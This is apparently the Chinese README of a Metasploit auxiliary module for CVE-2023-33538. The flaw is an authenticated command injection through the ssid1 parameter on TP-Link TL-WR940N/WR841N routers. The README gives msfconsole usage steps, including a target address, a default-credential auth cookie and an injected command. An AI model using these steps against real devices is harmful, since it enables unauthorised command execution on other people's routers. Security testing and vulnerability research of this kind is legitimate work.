这个 Metasploit 辅助模块 针对 TP-Link TL-WR940N V2/V4 和 TL-WR841N V8/V10 路由器中一个已认证的 命令注入漏洞。
问题出在 WlanNetworkRpm.htm 中使用的易受攻击的 ssid1 参数,该参数允许注入任意 shell 命令。
如果成功,攻击者可以在设备上执行任意命令。
关于 CVE 的更多信息:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb 文件复制到你的 Metasploit 模块文件夹,例如:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
该模块不执行身份认证。你需要手动从成功登录路由器 Web 界面的过程中提取
Authorizationcookie 和会话前缀。
该模块仅用于教育目的。
请勿将此代码用于你不拥有或未经明确许可测试的设备或基础设施。
如果你发现 bug 或有改进想法——欢迎提交 issue 或留言评论。